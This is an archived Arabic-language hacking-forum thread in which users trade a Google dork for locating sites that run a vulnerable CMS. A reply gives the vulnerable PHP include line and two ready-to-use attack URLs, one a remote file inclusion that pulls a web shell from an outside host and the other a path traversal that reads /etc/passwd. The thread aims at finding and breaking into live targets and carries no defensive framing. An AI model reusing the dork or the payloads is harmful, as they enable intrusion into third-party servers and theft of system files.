مشاهدة النسخة كاملة : ممكن دورك هذه الثغرة
mahmoud arafa
06-09-2013, 07:08 AM
السلام عليكم
هذه الثغرة ليس لها دورك ومش عارف اجيب الدورك
http://www.exploit-db.com/exploits/25971/
ممكن حد يجيبلي الدورك بس اهم حاجة يكتب ازاي
Iraqe Hacker
06-09-2013, 09:16 AM
نعم هذا الدورك
intext:alerts/alertConfigField.php=
وبعدها تقوم بحقن الملف المصاب بكود php لزرع ثغرة RFI و LFI
هذا الكود
<?php include($_REQUEST["urlConfig"]); ?>
وبعدها مسار التنفيذ مثل هذه الروابط لثغرتين
cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt (http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?)
cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd (http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd)
mahmoud arafa
06-09-2013, 09:01 PM
لو ما طلعشي اي نتيجة بحث يبقي الثغرة خلاص مدتها انتهت او الشركة صاحبة السكربت رقعت الثغرة يعني مثلا
Powered by vBulletin® Version 4.2.6 by vBS Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.